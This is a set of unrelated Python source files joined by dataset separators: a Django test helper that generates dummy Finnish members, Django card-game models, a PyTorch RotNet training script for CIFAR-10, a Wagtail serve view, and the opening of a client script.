"Matias", "Ilona", "Oliver", "Helmi", "Leo", "Iida", "Eemeli",
"Emilia", "Niilo", "Eveliina", "Valtteri", "Siiri", "Rasmus", "Katariina",
"Aleksi", "Veera", "Oliver", "Ella", "Antero", "Sanni", "Miro",
"Aada", "Viljami", "Vilma", "Jimi", "Kristiina", "Kristian", "Nea",
"Aatu", "Anni", "Tapani", "Milla", "Daniel", "Johanna", "Samuel",
"Pinja", "Juho", "Emma", "Lauri", "Lotta", "Aapo", "Sara",
"Tapio", "Olivia", "Eemeli", "Linnea", "Veeti", "Elli", "Jesse",
"Anna", "Eetu", "Emmi", "Arttu", "Elina", "Emil", "Ronja",
"Lenni", "Venla", "Petteri", "Elsa", "Valtteri", "Julia", "Daniel",
"Nella", "Otto", "Aleksandra", "Eemil", "Kerttu", "Aaro", "Helena",
"Juho", "Oona", "Joel", "Siiri", "Leevi", "Viivi", "Niklas",
"Karoliina", "Joona", "Julia", "Ville", "Inkeri", "Julius", "Pihla",
"Roope", "Alexandra", "Elmeri", "Peppi", "Konsta", "Alisa", "Leo",
"Nelli", "Juuso", "Susanna", "Otto", "Neea", "Luka", "Josefiina",
"Aleksanteri", "Jenna", "Mikael", "Kaarina", "Akseli", "Laura", "Samuel",
"Lotta", "Sakari", "Anna", "Oskari", "Alina", "Anton", "Milja",
"Julius", "Ellen", "Veikko", "Enni", "Luukas", "Veera", "Toivo",
"Alisa", "Jere", "Sanni", "Eino", "Ilona", "Niko", "Kerttu",
"Niilo", "Inka", "Eelis", "Elsa", "Jaakko", "Amanda", "Eeli",
"Elli", "Rasmus", "Minea", "Anton", "Vilma", "Antti", "Matilda",
"Eino", "Vilhelmiina", "Väinö", "Iina", "Emil", "Nea", "Henrik",
"Eevi", "Kasper", "Anneli", "Matti", "Ellen", "Tuomas", "Maija",
"Aatu", "Saana", "Eemil", "Tuulia", "Kalevi", "Minttu", "Akseli",
"Anniina", "Joonatan", "Lilja", "Viljami"]
# Kapsi members public unique last name listing as of today.
last_names = [
"Aalto", "Aaltonen", "Addams-Moring", "Aho", "Ahola", "Ahonen",
"Aimonen", "Al-Khanji", "Ala-Kojola", "Alakotila", "Alanenpää", "Alanko",
"Alardt", "Alaspää", "Alatalo", "Andelin", "Annala", "Antinkaapo",
"Anttila", "Anttonen", "Arstila", "Arvelin", "Auvinen", "Averio",
"Bainton", "Behm", "Blomberg", "Borén", "Brander", "Brockman",
"Brunberg", "Busk", "Ceder", "Corsini", "Duldin", "Eerikäinen",
"Eerola", "Ekblom", "Ekman", "Eloranta", "Emas", "Eriksson",
"Ernsten", "Erola", "Eräluoto", "Eskelinen", "Eskola", "Everilä",
"Finnilä", "Fjällström", "Forslund", "Grandell", "Grenrus", "Gröhn",
"Grönlund", "Haapajärvi", "Haapala", "Haasanen", "Haatainen", "Haataja",
"Haavisto", "Hagelberg", "Hahtola", "Haikonen", "Haimi", "Hakanen",
"Hakkarainen", "Halkosaari", "Halla", "Hallamaa", "Hallikainen", "Halme",
"Halmu", "Halonen", "Hamara", "Hanhijärvi", "Hannola", "Hannus",
"Hansson", "Harju", "Harkila", "Harma", "Hasanen", "Hassinen",
"Hast", "Hastrup", "Hatanpää", "Haverinen", "Heikkerö", "Heikkilä",
"Heikkinen", "Heikura", "Heimonen", "Heinikangas", "Heinonen", "Heinänen",
"Heiramo", "Heiskanen", "Helander", "Helenius", "Herd", "Herranen",
"Herukka", "Heusala", "Hietala", "Hietanen", "Hietaranta", "Hiilesrinne",
"Hiljander", "Hill", "Hillervo", "Hiltunen", "Hinkula", "Hintikka",
"Hirvojärvi", "Holopainen", "Hongisto", "Honkanen", "Honkonen", "Hopiavuori",
"Hotti", "Huhtala", "Huhtinen", "Hulkko", "Huoman", "Huotari",
"Huovinen", "Hurtta", "Huttunen", "Huuhtanen", "Huuskonen", "Hyttinen",
"Hyvärinen", "Häkkinen", "Hämeenkorpi", "Hämäläinen", "Hänninen", "Höglund",
"Ihatsu", "Ijäs", "Ikonen", "Ilmonen", "Iltanen", "Ingman",
"Inha", "Inkinen", "Isaksson", "Isomäki", "Ituarte", "Itäsalo",
"Jaakkola", "Jaatinen", "Jakobsson", "Jalonen", "Jetsu", "Johansson",
"Jokela", "Jokinen", "Jokitalo", "Jormanainen", "Junni", "Juopperi",
"Juutinen", "Juvankoski", "Juvonen", "Järvenpää", "Järvensivu", "Järvinen",
"Jääskelä", "Jääskeläinen", "Kaarela", "Kaartti", "Kaija", "Kaikkonen",
"Kaila", "Kainulainen", "Kajan", "Kakko", "Kallio", "Kanniainen",
"Kanninen", "Kare-Mäkiaho", "Karhunen", "Kari", "Karimäki", "Karisalmi",
"Karjalainen", "Karlsson", "Karppi", "Karttunen", "Karvinen", "Karvonen",
"Kasari", "Kataja", "Katavisto", "Kattelus", "Kauppi", "Kauppinen",
"Keihänen", "Keijonen", "Kekki", "Kekkonen", "Kelanne", "Kenttälä",
"Keränen", "Keskitalo", "Kesti", "Ketolainen", "Ketonen", "Kettinen",
"Kianto", "Kiiskilä", "Kilpiäinen", "Kinnula", "Kinnunen", "Kirkkopelto",
"Kirves", "Kittilä", "Kiviharju", "Kivikunnas", "Kivilahti", "Kiviluoto",
"Kivimäki", "Kivirinta", "Knuutinen", "Kohtamäki", "Kois", "Koivisto",
"Koivu", "Koivula", "Koivulahti", "Koivumaa", "Koivunalho", "Koivunen",
"Koivuranta", "Kokkonen", "Kokkoniemi", "Komulainen", "Konsala", "Konttila",
"Konttinen", "Koponen", "Korhonen", "Kortesalmi", "Kortetmäki", "Koskela",
"Koskenniemi", "Koski", "Petteri", "Koskinen", "Kotanen", "Koulu",
"Kraft", "Krohn", "Krüger", "Kudjoi", "Kuhanen", "Kuittinen",
"Kuitunen", "Kujala", "Kujansuu", "Kulju", "Kurkimäki", "Kuukasjärvi",
"Kuusisto", "Kuvaja", "Kymäläinen", "Kyntöaho", "Kähkönen", "Käki",
"Kärkkäinen", "Kärnä", "Laaksonen", "Laalo", "Laapotti", "Lagren",
"Lagus", "Lahdenmäki", "Lahdenperä", "Lahikainen", "Lahtela", "Laine",
"Lainiola", "Laitila", "Laitinen", "Untamo", "Lakhan", "Lamminen",
"Lammio", "Lampela", "Lampén", "Lampi", "Lampinen", "Lankila",
"Lapinniemi", "Lappalainen", "Larivaara", "Larja", "Latvatalo", "Laurila",
"Laxström", "Lehmuskenttä", "Lehtinen", "Lehtola", "Lehtonen", "Leikkari",
"Leiviskä", "Leivo", "Lempinen", "Lepistö", "Leppänen", "Levonen",
"Lievemaa", "Liimatta", "Likitalo", "Liljeqvist", "Lindeman", "Lindén",
"Lindfors", "Lindström", "Linkoaho", "Linkola", "Linnaluoto", "Linnamäki",
"Lintervo", "Lintumäki", "Lipsanen", "Liukkonen", "Loikkanen", "Loponen",
"Louhiranta", "Lundan", "Luosmaa", "Luukko", "Luukkonen", "Lähdemäki",
"Lähteenmäki", "Löfgren", "Löytty", "Maaranen", "Magga", "Makkonen",
"Maksimainen", "Malinen", "Malm", "Malmivirta", "Manner", "Manninen",
"Mansikkala", "Marin", "Marjamaa", "Marjoneva", "Markkanen", "Martikainen",
"Marttila", "Matikainen", "Matkaselkä", "Mattila", "Maukonen", "Melama",
"Melenius", "Mellin", "Merikivi", "Meriläinen", "Merisalo", "Meskanen",
"Miettunen", "Miinin", "Mikkonen", "Moisala", "Moisio", "Mononen",
"Montonen", "Mustonen", "Myllymäki", "Myllyselkä", "Myntti", "Myyry",
"Mähönen", "Mäkelä", "Mäkeläinen", "Mäkinen", "Mäkitalo", "Mänki",
"Mäntylä", "Märsy", "Mättö", "Mäyränen", "Määttä", "Möller",
"Nemeth", "Niemelä", "Niemenmaa", "Niemi", "Nieminen", "Niiranen",
"Nikander", "Nikkonen", "Nikula", "Niskanen", "Nisula", "Nousiainen",
"Nummiaho", "Nurmi", "Nurminen", "Nygren", "Nykänen", "Nylund",
"Nyrhilä", "Näyhä", "Ohtamaa", "Ojala", "Ollila", "Olmari",
"Oras", "Paajanen", "Paalanen", "Paananen", "Packalen", "Pahalahti",
"Paimen", "Pakkanen", "Palo", "Palokangas", "Palomäki", "Palosaari",
"Panula", "Pappinen", "Parkkinen", "Partanen", "Parviainen", "Pasila",
"Paul", "Pekkanen", "Peltola", "Peltonen", "Pennala", "Pentikäinen",
"Penttilä", "Perttunen", "Perälä", "Pesonen", "Peuhkuri", "Peurakoski",
"Piesala", "Pietarinen", "Pietikäinen", "Pietilä", "Pieviläinen", "Pihkala",
"Pihlaja", "Pihlajaniemi", "Piittinen", "Pikkarainen", "Pirinen", "Pirttijärvi",
"Pitkänen", "Pohjalainen", "Pohjanraito", "Pohjola", "Pokkinen", "Polso",
"Portaankorva", "Portti", "Posti", "Prusi", "Pulliainen", "Puranen",
"Pusa", "Pussinen", "Pyhäjärvi", "Pylvänäinen", "Pölönen", "Pöykkö",
"Raatikainen", "Rahikainen", "Rainela", "Raitanen", "Raitmaa", "Raittila",
"Rajala", "Rajamäki", "Ranki", "Ranta", "Rantala", "Rantamäki",
"Rapo", "Rasilainen", "Rauhala", "Rautiainen", "Rehu", "Reijonen",
"Reunanen", "Riikonen", "Rimpiläinen", "Rissanen", "Ristilä", "Rokka",
"Roponen", "Ruhanen", "Runonen", "Rutanen", "Ruuhonen", "Ruusu",
"Ryhänen", "Rytkönen", "Räsänen", "Räty", "Rönkkö", "Rössi",
"Saarenmäki", "Saarijoki", "Saarikoski", "Saarinen", "Saastamoinen", "Saine",
"Saksa", "Salkia", "Salmela", "Salmi", "Salminen", "Salo",
"Salokanto", "Salomaa", "Salomäki", "Salonen", "Sand", "Sanisalo",
"Santala", "Savolainen", "Schwartz", "Selin", "Seppä", "Seppälä",
"Seppänen", "Setälä", "Siekkinen", "Sievänen", "Sihvo", "Siironen",
"Siitonen", "Silfver", "Sillanpää", "Siltala", "Simola", "Simon",
"Siniluoto", "Sinivaara", "Sipilä", "Sivula", "Sjöberg", "Soili",
"Soini", "Soininen", "Solja", "Solkio", "Sonck", "Sopanen",
"Sotejeff", "Staven", "Strand", "Suckman", "Sunell", "Suolahti",
"Suominen", "Suoniitty", "Suonvieri", "Suorsa", "Suvanne", "Syreeni",
"Syrjä", "Syrjälä", "Syvänen", "Särkkä", "Säämäki", "Sääskilahti",
"Södervall", "Tahvanainen", "Taina", "Taipale", "Taivalsalmi", "Tallqvist",
"Tamminen", "Tammisto", "Tanhua", "Tanner", "Tanskanen", "Tapper-Veirto",
"Tarsa", "Tarvainen", "Tiainen", "Tiira", "Tikka", "Tikkanen",
"Toivanen", "Toivonen", "Tolvanen", "Tulonen", "Tunkkari", "Tuohimaa",
"Tuomela", "Tuomi", "Tuomimaa", "Tuominen", "Tuomivaara", "Turanlahti",
"Turpeinen", "Turunen", "Tuunainen", "Tuusa", "Tykkä", "Tyrväinen",
"Tähtinen", "Töttö", "Urhonen", "Uuksulainen", "Uusitalo", "Vaarala",
"Vaaramaa", "Vainio", "Vainionpää", "Valkeinen", "Valkonen", "Valtonen",
"Valve", "Varanka", "Varrio", "Varsaluoma", "Vartiainen", "Veijalainen",
"Veijola", "Velhonoja", "Venäläinen", "Vesala", "Vesiluoma", "Vestu",
"Vierimaa", "Viippola", "Viitala", "Viitanen", "Vilkki", "Vilppunen",
"Vire", "Virta", "Virtala", "Virtanen", "Vitikka", "Voipio",
"Vuokko", "Vuola", "Vuollet", "Vuorela", "Vuorinen", "Vähäkylä",
"Vähämäki", "Vähänen", "Väisänen", "Välimaa", "Väänänen", "Wahalahti",
"Wikman", "Yli-Hukka", "Ylimäinen", "Ylinen", "Ylönen", "Yrttikoski",
"Äijänen", "Ärmänen"]
def random_first_name():
return random.choice(first_names)
def random_last_name():
return random.choice(last_names)
def create_dummy_member(status, type='P', mid=None):
if status not in ['N', 'P', 'A']:
raise Exception("Unknown membership status") # pragma: no cover
if type not in ['P', 'S', 'O', 'H']:
raise Exception("Unknown membership type") # pragma: no cover
i = random.randint(1, 300)
fname = random_first_name()
d = {
'street_address' : 'Testikatu %d'%i,
'postal_code' : '%d' % (i+1000),
'post_office' : 'Paska kaupunni',
'country' : 'Finland',
'phone' : "%09d" % (40123000 + i),
'sms' : "%09d" % (40123000 + i),
'email' : '<EMAIL>.com' % i,
'homepage' : 'http://www.example.com/%d'%i,
'first_name' : fname,
'given_names' : '%s %s' % (fname, "Kapsi"),
'last_name' : random_last_name(),
}
contact = Contact(**d)
contact.save()
if type == 'O':
contact.organization_name = contact.name()
contact.first_name = ''
contact.last_name = ''
contact.save()
membership = Membership(id=mid, type=type, status=status,
organization=contact,
nationality='Finnish',
municipality='Paska kaupunni',
extra_info='Hintsunlaisesti semmoisia tietoja.')
else:
membership = Membership(id=mid, type=type, status=status,
person=contact,
nationality='Finnish',
municipality='Paska kaupunni',
extra_info='Hintsunlaisesti semmoisia tietoja.')
logger.info("New application %s from %s:." % (str(contact), '::1'))
membership.save()
return membership
class MockLoggingHandler(logging.Handler):
"""Mock logging handler to check for expected logs as per:
<http://stackoverflow.com/questions/899067/how-should-i-verify-a-log-message-when-testing-python-code-under-nose/1049375#1049375>"""
def __init__(self, *args, **kwargs):
self.reset()
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
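# Minimal usage sketch from a Django test module (not part of the original
# file); the asserted fields follow create_dummy_member above:
#
#   from django.test import TestCase
#
#   class DummyMemberTest(TestCase):
#       def test_dummy_person_member(self):
#           m = create_dummy_member('N')        # new, personal membership
#           self.assertEqual(m.status, 'N')
#           self.assertIsNotNone(m.person)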
|
StarcoderdataPython
|
11326511
|
<gh_stars>1-10
from db_file_storage.model_utils import delete_file_if_needed, delete_file
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
from django.utils.translation import gettext_lazy as _
class CardLevel(models.Model):
"""
Card Level.
"""
class Level(models.IntegerChoices):
"""
Enum of possible card levels.
"""
COMMON = 1, _("Typowa"),
RARE = 2, _("Rzadka"),
EPIC = 3, _("Epicka")
level = models.IntegerField(primary_key=True, choices=Level.choices, default=Level.COMMON)
name = models.CharField(max_length=15)
def __str__(self):
return f"{self.name}"
def save(self, *args, **kwargs):
if not isinstance(self.level, CardLevel.Level):
self.level = CardLevel.Level(self.level)
self.name = self.level.label
super(CardLevel, self).save(*args, **kwargs)
class CardEffect(models.Model):
"""
Represents a card effect, contains it's identifier, name and displayed tooltip.
"""
class EffectId(models.IntegerChoices):
"""
All possible effects
"""
DMG = 1, _("Zadawanie obrażeń")
SHIELD = 2, _("Tarcza")
SWAP_RND = 3, _("Losowa zamiana kolejności kart")
STOP = 4, _("Zatrzymanie na jedną turę")
DOUBLEACTION = 5, _("Dwukrotne wykonanie się karty")
HEAL = 6, _("Leczenie")
BLOCK = 7, _("Blokowanie następnej karty")
EMPOWER = 8, _("Zwiększenie mocy następnej karty")
SKIP = 9, _("Pomijanie następnej karty")
EMPOWER_DMG = 10, _("Zwiększenie obrażeń następnej karty")
EMPOWER_SHIELD = 11, _("Zwiększenie mocy tarczy następnej karty")
EMPOWER_HEAL = 12, _("Zwiększenie mocy leczenia następnej karty")
TRUE_DMG = 13, _("Obrażenia nieuchronne")
id = models.IntegerField(primary_key=True, choices=EffectId.choices, default=EffectId.DMG)
name = models.CharField(max_length=50, help_text="A pretty effect name on-display.")
tooltip = models.TextField(max_length=60, null=True, help_text="Effect description")
    has_modifier = models.BooleanField(default=False, help_text="This field tells us whether a specific effect can "
                                                                "have modifiers (power, range, etc.). Most of the "
                                                                "effects have no such modifiers, so the default "
                                                                "is False.")
icon = models.FileField(null=True,
blank=True,
                            help_text="Holds an image representing the effect",
upload_to='cards.ImageStorage/bytes/filename/mimetype')
def __str__(self):
return f"{self.name}"
def save(self, *args, **kwargs):
if not isinstance(self.id, CardEffect.EffectId):
self.effect = CardEffect.EffectId(self.id)
self.name = self.effect.label
super(CardEffect, self).save(*args, **kwargs)
def base_card_info_factory(upload_images_to: str):
"""
This function should be used when you need to derive from abstract BaseCardInfo model class.
Creates abstract model class of card info with provided place to store images.
Depending on concrete class that you are creating you may want to store images in different places.
:param upload_images_to: Place to store card info's images.
:return: Abstract BaseCardInfo model class.
"""
class BaseCardInfo(models.Model):
"""
Stores generic information about card (name, tooltip, etc ...).
"""
class Meta:
abstract = True
from cards.validators import validate_file_size
name = models.CharField(max_length=36, help_text="Displayed card's name.")
tooltip = models.TextField(help_text="Card's description. Gets displayed together with the card as a tooltip.",
max_length=80)
image = models.FileField(upload_to='cards.ImageStorage/bytes/filename/mimetype', null=True, blank=True,
                                 help_text="An image. We don't really "
                                           "know what that should be.",
validators=[validate_file_size])
subject = models.CharField(max_length=60, null=True,
help_text="Subject name. In the future this field will be an"
" id pointing to Subject object.")
def save(self, *args, **kwargs):
delete_file_if_needed(self, 'image')
super(BaseCardInfo, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
super(BaseCardInfo, self).delete(*args, **kwargs)
delete_file(self, 'image')
return BaseCardInfo
class CardInfo(base_card_info_factory('cards/images/')):
"""
Stores generic information about Card.
See: BaseCardInfo which is inner class in base_card_info_factory function.
"""
class Meta:
constraints = [
models.UniqueConstraint(fields=['name'], name='unique_CardInfo_name')
]
def __str__(self):
return f"Card Info < id:{self.id} name:{self.name} >"
def base_card_factory(related_card_info_class: type):
"""
This function should be used when you need to derive from abstract BaseCard model class.
Creates abstract model class of card with provided related card info class.
Depending on concrete card model class that you are creating you may want to reference different
card info model classes.
:param related_card_info_class: Card info class that this BaseCard class will be related to.
:return: Abstract BaseCard model class related to given card info class.
"""
class BaseCard(models.Model):
"""
This may be understood as coupling card's basic info (like name, tooltip) with appropriate levels,
that is, if we create a card's info model, we create multiple cards depending on how many levels the card
may have.
"""
info = models.ForeignKey(related_card_info_class, related_name='levels', unique=False, on_delete=models.CASCADE)
effects_description = models.CharField(max_length=500, help_text="A brief description of this level's effects.",
null=True, default="description")
level = models.ForeignKey(CardLevel, unique=False, on_delete=models.CASCADE)
next_level_cost = models.IntegerField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)], blank=True)
class Meta:
abstract = True
"""
This makes (info, level) unique
"""
constraints = [
models.UniqueConstraint(fields=['info', 'level'],
name=f'unique_{related_card_info_class.__name__}_level')
]
return BaseCard
class Card(base_card_factory(CardInfo)):
"""
This may be understood as coupling CardInfo with appropriate levels,
that is, if we create a CardInfo model, we create multiple Cards depending on how many levels the Card may have.
See: BaseCard which is inner class in base_card_factory function.
"""
def __str__(self):
return f"Card < id:{self.id} level:{self.level} info:{self.info.id} >"
pass
def base_card_level_effects_factory(foreignkey_card_cls: type):
"""
This function should be used when you need to derive from abstract BaseCardLevelEffects model class.
Creates abstract base class of card-level effects model with ForeignKey field referencing given card class.
Card-level effects model couples concrete card with its effects.
:param foreignkey_card_cls: Card class that will be referenced by ForeignKey.
:return: Abstract BaseCardLevelEffects model class coupling instances of given card model class with it's effects.
"""
class BaseCardLevelEffects(models.Model):
"""
This is like an extended many-to-many relation in databases.
Couples card objects with its effects.
"""
class Meta:
abstract = True
class Target(models.IntegerChoices):
"""
Possible targets.
"""
PLAYER = 1, _("gracz")
            OPPONENT = 2, _("przeciwnik")
card = models.ForeignKey(foreignkey_card_cls, related_name='effects', unique=False, on_delete=models.CASCADE)
card_effect = models.ForeignKey(CardEffect, unique=False, on_delete=models.CASCADE)
# This isn't unique even as a pair with card, as a single card on a given level '
# may have multiple of the same effect.
target = models.IntegerField(choices=Target.choices, default=Target.OPPONENT)
power = models.IntegerField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)])
# Range defines how the power attribute will vary in card logic.
# So an actual power will be randomized from range (power - range, power + range)
range = models.FloatField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)])
return BaseCardLevelEffects
class CardLevelEffects(base_card_level_effects_factory(Card)):
"""
This is like an extended many-to-many relation in databases.
Couples Card objects with its effects.
See: BaseCardLevelEffects which is inner class in base_card_level_effects_factory function.
"""
def __str__(self):
return f"CardLevelEffects < Card: {self.card.id} Effect: {self.card_effect} >"
pass
class ImageStorage(models.Model):
bytes = models.BinaryField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
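# Hedged usage sketch (editor's addition): illustrates how the models above
# compose. A CardInfo holds the displayed data, one Card row exists per
# (info, level) pair, and CardLevelEffects couples a Card with a CardEffect.
# All field values below are illustrative assumptions, and the sketch assumes
# the CardLevel/CardEffect rows were created beforehand (e.g. in a migration).
def _card_models_sketch():
    common = CardLevel.objects.get(pk=CardLevel.Level.COMMON)
    dmg = CardEffect.objects.get(pk=CardEffect.EffectId.DMG)
    info = CardInfo.objects.create(name="Fireball", tooltip="Deals damage.", subject="Algebra")
    card = Card.objects.create(info=info, level=common, next_level_cost=10)
    CardLevelEffects.objects.create(
        card=card,
        card_effect=dmg,
        target=CardLevelEffects.Target.OPPONENT,
        power=20,
        range=5.0,
    )
    return card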
|
StarcoderdataPython
|
6568637
|
<gh_stars>0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torchvision
from torchvision import datasets, transforms
import torch.nn.functional as F
import torch.optim as optim
import models as mdl
import numpy as np
import argparse
import pickle
import os
import datetime
import time
import math
import shutil
def get_parser():
parser = argparse.ArgumentParser(description='Scalable Compression')
parser.add_argument('--batch_size', type=int, default=128,
help='input batch size for training (default: 128)')
parser.add_argument('--epochs', type=int, default=1,
help='number of epochs to train (default: 1)')
parser.add_argument('--lr', type=float, default=0.1,
help='learning rate (default: 0.1)')
parser.add_argument('--device', type=str, default='cuda',
help='Device to be used (acceptable values: cuda, cpu) (default: cuda)')
parser.add_argument('--milestones', nargs="+", type=int, default=[30,60,80],
help='Milestones for learning rate decay (default: [30, 60, 80])')
# not sure if I need
parser.add_argument('--model', type=str, default='rotnet',
                        help='model choice (acceptable values: rotnet, supervised, rot-nonlinear, rot-conv) (default: rotnet)')
parser.add_argument('--nins', type=int, default=4,
help='number of nin blocks to comprise the model (default: 4)')
# not sure if I need
parser.add_argument('--layer', type=int, default=2,
help='rotnet layer to take features from to use for classifier (default: 2)')
parser.add_argument('--opt', type=str, default='sgd',
help='Optimizer to be used (acceptable values: sgd, adam) (default: sgd)')
parser.add_argument('--momentum', type=float, default=0.9,
                        help='Momentum for optimizer (default: 0.9)')
parser.add_argument('--weight_decay', default=5e-4, type=float)
parser.add_argument('--print_after_batches', type=int, default=100,
                        help='Print training progress every print_after_batches batches (default: 100)')
parser.add_argument('--results_dir', default='results/', type=str)
parser.add_argument('--suffix', default='', type=str,
help="When I need to custom name the final results folder, must begin with _")
parser.add_argument('--epochs_to_save', nargs="+", type=int, default=[100],
help='List of epochs to save (default: [100])')
return parser
def rotate(data, device):
transform = transforms.Compose([transforms.Normalize((125.3/255, 123.0/255, 113.9/255), (63.0/255, 62.1/255, 66.7/255)),])
    data = data.to(device)  # .to() is not in-place; reassign so the batch is actually moved
transformed = []
rotation = []
for image in data:
transformed.append(transform(image))
rotation.append(0)
pic = torch.transpose(image,1,2)
pic = torch.flip(pic,[2])
transformed.append(transform(pic))
rotation.append(1)
pic = torch.flip(image,[1])
pic = torch.flip(pic,[2])
transformed.append(transform(pic))
rotation.append(2)
pic = torch.flip(image,[2])
pic = torch.transpose(pic,1,2)
transformed.append(transform(pic))
rotation.append(3)
rot = torch.LongTensor(rotation)
return (torch.stack(transformed), rot)
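# Hedged usage sketch (editor's addition): documents the contract of rotate().
# For a batch of N images it returns 4*N normalized images (0/90/180/270 degree
# rotations) plus the rotation class labels used as the self-supervised target.
def _rotate_contract_sketch():
    dummy_batch = torch.rand(2, 3, 32, 32)              # two RGB 32x32 images
    images, labels = rotate(dummy_batch, device="cpu")
    assert images.shape == (8, 3, 32, 32)
    assert labels.tolist() == [0, 1, 2, 3, 0, 1, 2, 3]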
def train(args, network, train_loader, optimizer, mult, scheduler, epoch):
network.train()
total_images_till_now = 0
total_images = len(train_loader.dataset)*mult
for batch_idx, (data, target) in enumerate(train_loader):
data, target = rotate(data, args.device)
data = data.to(args.device)
target = target.to(args.device)
optimizer.zero_grad()
output, _, _ = network(data)
loss = F.cross_entropy(output, target)
loss.backward()
optimizer.step()
total_images_till_now = total_images_till_now + len(data)
if batch_idx % args.print_after_batches == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch+1, total_images_till_now, total_images,
100. * total_images_till_now/total_images, loss.item()))
scheduler.step()
return
def test(args, network, test_loader, mult, datatype):
network.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = rotate(data, args.device)
data = data.to(args.device)
target = target.to(args.device)
output, _, _ = network(data)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
total_images = len(test_loader.dataset)*mult
test_loss /= total_images
test_acc = 100. * correct / total_images
print('\n{} set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
datatype, test_loss, correct, total_images, test_acc))
return test_loss, test_acc
def main(args):
# hard coded values
in_channels = 3 # rgb channels of input image
out_classes = 4 # number of rotations
lr_decay_rate = 0.2 # lr is multiplied by decay rate after a milestone epoch is reached
mult = 4 # data become mult times
####################
train_transform = transforms.Compose([transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor()])
test_transform = transforms.ToTensor()
trainset = datasets.CIFAR10(root='results/', train=True, download=True, transform=train_transform)
testset = datasets.CIFAR10(root='results/', train=False, download=True, transform=test_transform)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=0)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=0)
network = mdl.RotNet(in_channels=in_channels, num_nin_blocks=args.nins, out_classes=out_classes).to(args.device)
if args.opt == 'adam':
optimizer = optim.Adam(network.parameters(), lr=args.lr, weight_decay=args.weight_decay)
else:
optimizer = optim.SGD(network.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.milestones, gamma=lr_decay_rate)
####################################### Saving information
results_dict = {}
# These will store the values for best test accuracy model
results_dict['train_loss'] = -1
results_dict['train_acc'] = -1
results_dict['test_loss'] = -1
results_dict['test_acc'] = -1
results_dict['best_acc_epoch'] = -1
# For storing training history
results_dict['train_loss_hist'] = []
results_dict['train_acc_hist'] = []
results_dict['test_loss_hist'] = []
results_dict['test_acc_hist'] = []
# directories to save models
checkpoint_path = os.path.join(args.results_dir, 'model.pth')
checkpoint_path_best_acc = os.path.join(args.results_dir, 'model_best_acc.pth')
test_acc_max = -math.inf
loop_start_time = time.time()
checkpoint = {}
for epoch in range(args.epochs):
train(args, network, train_loader, optimizer, mult, scheduler, epoch)
train_loss, train_acc = test(args, network, train_loader, mult, 'Train')
results_dict['train_loss_hist'].append(train_loss)
results_dict['train_acc_hist'].append(train_acc)
test_loss, test_acc = test(args, network, test_loader, mult, 'Test')
results_dict['test_loss_hist'].append(test_loss)
results_dict['test_acc_hist'].append(test_acc)
        print('Epoch {} finished --------------------------------------------------------------------------'.format(epoch+1))
checkpoint = {'model_state_dict': network.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'epoch':epoch+1,
'train_loss':train_loss,
'train_acc':train_acc,
'test_loss':test_loss,
'test_acc':test_acc}
if test_acc > test_acc_max:
test_acc_max = test_acc
if os.path.isfile(checkpoint_path_best_acc):
os.remove(checkpoint_path_best_acc)
torch.save(checkpoint, checkpoint_path_best_acc)
results_dict['best_acc_epoch'] = epoch+1
results_dict['train_loss'] = train_loss
results_dict['train_acc'] = train_acc
results_dict['test_loss'] = test_loss
results_dict['test_acc'] = test_acc
if epoch+1 in args.epochs_to_save:
torch.save(checkpoint, os.path.join(args.results_dir, 'model_epoch_'+str(epoch+1)+'.pth'))
torch.save(checkpoint, checkpoint_path)
print('Total time for training loop = ', time.time()-loop_start_time)
return results_dict
# Starting the program execution from here
if __name__ == '__main__':
start_time = time.time()
parser = get_parser()
args = parser.parse_args()
args.results_dir = os.path.join(args.results_dir, 'rotnet_'+str(args.nins)+'_ninblocks'+args.suffix)
assert (not os.path.exists(args.results_dir))
if not os.path.exists(args.results_dir):
os.makedirs(args.results_dir)
results_file = os.path.join(args.results_dir, 'results_dict.pickle')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print('Experiment starting at ', datetime.datetime.now())
print(' ')
options = vars(args)
keys = options.keys()
for key in keys:
print(key, ': ', options[key])
print(' ')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print(' ')
print(' ')
results_dict = main(args)
# saving the configuration
for key in keys:
new_key = 'config_' + key
results_dict[new_key] = options[key]
with open(results_file, 'wb') as f:
pickle.dump(results_dict, f)
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print('Total time for experiment: ', time.time()-start_time, ' seconds')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
|
StarcoderdataPython
|
5186581
|
<filename>wagtail/wagtailcore/views.py
from django.http import Http404
def serve(request, path):
# we need a valid Site object corresponding to this request (set in wagtail.wagtailcore.middleware.SiteMiddleware)
# in order to proceed
if not request.site:
raise Http404
path_components = [component for component in path.split('/') if component]
return request.site.root_page.specific.route(request, path_components)
|
StarcoderdataPython
|
1804405
|
<reponame>ohsu-comp-bio/ccc_client<gh_stars>0
import argparse
from ccc_client.app_repo.AppRepoRunner import AppRepoRunner
from ccc_client.utils import print_API_response
def run(args):
runner = AppRepoRunner(args.host, args.port, args.authToken)
r = runner.update_metadata(args.imageId, args.metadata)
print_API_response(r)
parser = argparse.ArgumentParser()
